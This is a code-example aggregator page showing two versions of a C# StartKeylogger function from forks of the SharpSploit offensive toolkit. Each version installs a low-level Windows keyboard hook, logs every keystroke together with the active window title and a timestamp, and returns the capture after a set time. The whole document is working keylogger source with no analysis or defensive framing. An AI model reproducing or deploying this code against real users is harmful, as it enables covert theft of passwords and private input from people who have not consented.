コード例 #1
0
ファイル: Keylogger.cs プロジェクト: wolfking2/SharpSploit
        /// <summary>
        /// Starts the Keylogger
        /// </summary>
        /// <author>Scottie Austin (@checkymander)</author>
        /// <returns>String containing the captured keystrokes, along with identification of what window they were entered in.</returns>
        /// <param name="Seconds">The amount of time in seconds the keylogger should run for before returning keystrokes.</param>
        public static string StartKeylogger(int Seconds)
        {
            StringBuilder Builder = new StringBuilder();

            Builder.Append(String.Format("Starting keylogger for {0} seconds.", Seconds));

            IntPtr HookID = IntPtr.Zero;
            string PreviousActiveWindow = "";

            Win32.User32.HookProc hookproc = (nCode, wParam, lParam) =>
            {
                var CurrentActiveWindow = GetActiveWindowTitle();
                if (CurrentActiveWindow != PreviousActiveWindow)
                {
                    Builder.Append("\r\n");
                    PreviousActiveWindow = CurrentActiveWindow;
                    Builder.Append("\r\n" + DateTime.Now + "\r\n" + CurrentActiveWindow + "\r\n--------------------------\r\n");
                }
                if (nCode >= 0 && wParam == (IntPtr)Win32.User32.WM_KEYDOWN)
                {
                    int vkCode = Marshal.ReadInt32(lParam);

                    bool shifted = Win32.User32.GetKeyState(160) < 0 || Win32.User32.GetKeyState(161) < 0;
                    Keys keycode = (Keys)vkCode;
                    if (!(shifted && KeyDictShift.TryGetValue(keycode, out string append)) && !KeyDict.TryGetValue(keycode, out append))
                    {
                        bool capped = Win32.User32.GetKeyState(20) != 0;
                        if ((capped && shifted) || !(capped || shifted))
                        {
                            append = keycode.ToString().ToLower();
                        }
                        else
                        {
                            append = keycode.ToString().ToUpper();
                        }
                    }
                    Builder.Append(append);
                }
                return(Win32.User32.CallNextHookEx(HookID, nCode, wParam, lParam));
            };
            HookID = Win32.User32.SetWindowsHookEx(Win32.User32.WH_KEYBOARD_LL, hookproc, Win32.Kernel32.GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName), 0);
            using (Timer timer = new Timer(Seconds * 1000))
            {
                timer.Elapsed += (source, e) =>
                {
                    Builder.AppendLine(String.Format("\r\n\r\nFinished Keylogger at {0:HH:mm:ss.fff}", DateTime.Now));
                    Win32.User32.UnhookWindowsHookEx(HookID);
                    timer.Stop();
                    Forms.Application.Exit();
                };
                timer.Start();
                Forms.Application.Run();
                return(Builder.ToString());
            }
        }
コード例 #2
0
ファイル: Keylogger.cs プロジェクト: slooppe/SharpSploit
        /// <summary>
        /// Starts the Keylogger
        /// </summary>
        /// <author>Scottie Austin (@checkymander)</author>
        /// <returns>String containing the captured keystrokes, along with identification of what window they were entered in.</returns>
        /// <param name="Seconds">The amount of time in seconds the keylogger should run for before returning keystrokes.</param>
        public static string StartKeylogger(int Seconds)
        {
            StringBuilder Builder = new StringBuilder();

            Builder.Append(String.Format("Starting keylogger for {0} seconds.", Seconds));

            IntPtr HookID = IntPtr.Zero;
            string PreviousActiveWindow = "";

            HookProc = (nCode, wParam, lParam) =>
            {
                try
                {
                    var CurrentActiveWindow = GetActiveWindowTitle();
                    if (CurrentActiveWindow != PreviousActiveWindow)
                    {
                        Builder.Append("\r\n");
                        PreviousActiveWindow = CurrentActiveWindow;
                        Builder.Append("\r\n" + DateTime.Now + "\r\n" + CurrentActiveWindow + "\r\n--------------------------\r\n");
                    }
                    if (nCode >= 0 && wParam == (IntPtr)Win32.User32.WM_KEYDOWN)
                    {
                        KbDllHookStruct kbHookStruct = (KbDllHookStruct)Marshal.PtrToStructure(lParam, typeof(KbDllHookStruct));
                        int             vkCode       = kbHookStruct.VirtualKeyCode;
                        bool            shifted      = PInvoke.Win32.User32.GetKeyState(160) < 0 || PInvoke.Win32.User32.GetKeyState(161) < 0;
                        Keys            keycode      = (Keys)vkCode;
                        if (!(shifted && KeyDictShift.TryGetValue(keycode, out string append)) && !KeyDict.TryGetValue(keycode, out append))
                        {
                            bool capped = PInvoke.Win32.User32.GetKeyState(20) != 0;
                            if ((capped && shifted) || !(capped || shifted))
                            {
                                append = keycode.ToString().ToLower();
                            }
                            else
                            {
                                append = keycode.ToString().ToUpper();
                            }
                        }
                        if (vkCode == 231)
                        {
                            append = ((char)kbHookStruct.ScanCode).ToString();
                        }
                        Builder.Append(append);
                    }
                }
                catch (Exception e)
                {
                    Console.Error.WriteLine("Keylogger Exception - " + e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace);
                }
                return(PInvoke.Win32.User32.CallNextHookEx(HookID, nCode, wParam, lParam));
            };
            HookID = PInvoke.Win32.User32.SetWindowsHookEx(Win32.User32.WH_KEYBOARD_LL, HookProc, PInvoke.Win32.Kernel32.GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName), 0);
            if (Seconds <= 0)
            {
                Forms.Application.Run();
                return("");
            }
            else
            {
                using (Timer timer = new Timer(Seconds * 1000))
                {
                    timer.Elapsed += (source, e) =>
                    {
                        Builder.AppendLine(String.Format("\r\n\r\nFinished Keylogger at {0:HH:mm:ss.fff}", DateTime.Now));
                        PInvoke.Win32.User32.UnhookWindowsHookEx(HookID);
                        timer.Stop();
                        Forms.Application.Exit();
                    };
                    timer.Start();
                    Forms.Application.Run();
                    return(Builder.ToString());
                }
            }
        }